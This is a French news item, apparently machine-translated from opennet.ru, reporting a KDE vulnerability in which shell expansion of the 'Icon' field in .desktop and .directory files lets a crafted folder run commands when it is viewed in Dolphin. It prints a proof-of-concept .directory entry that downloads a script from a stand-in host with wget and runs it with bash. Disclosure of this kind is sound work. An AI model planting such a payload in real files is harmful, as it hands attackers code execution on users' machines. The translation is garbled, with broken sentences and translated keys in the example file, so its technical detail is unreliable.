Dans KDE , qui permet à un attaquant d'exécuter des commandes arbitraires lorsqu'un utilisateur consulte un répertoire ou une archive contenant des fichiers « .desktop » et « .directory » spécialement conçus. Une attaque nécessite que l'utilisateur affiche simplement une liste de fichiers dans le gestionnaire de fichiers Dolphin, télécharge un fichier de bureau malveillant ou fasse glisser un raccourci sur le bureau ou dans un document. Le problème se manifeste dans la version actuelle des bibliothèques et versions antérieures, jusqu'à KDE 4. La vulnérabilité est toujours (CVE non attribué).
Le problème est dû à une implémentation incorrecte de la classe KDesktopFile qui, lors du traitement de la variable « Icon », sans échappement approprié, transmet la valeur à la fonction KConfigPrivate::expandString(), qui effectue l'expansion des caractères spéciaux du shell, y compris le traitement. les chaînes « $(..) » comme commandes à exécuter. Contrairement aux exigences de la spécification XDG, la mise en œuvre les constructions de shell sont produites sans séparer le type de paramètres, c'est-à-dire non seulement lors de la détermination de la ligne de commande de l'application à lancer, mais également lors de la spécification des icônes affichées par défaut.
Par exemple, pour attaquer envoyer à l'utilisateur une archive zip avec un répertoire contenant un fichier « .directory » comme :
[Entrée du bureau]
Type=Répertoire
Icône[$e]=$(wget${IFS}https://example.com/FILENAME.sh&&/bin/bash${IFS}FILENAME.sh)
Lorsque vous essayez d'afficher le contenu de l'archive dans le gestionnaire de fichiers Dolphin, le script https://example.com/FILENAME.sh sera téléchargé et exécuté.
Source: opennet.ru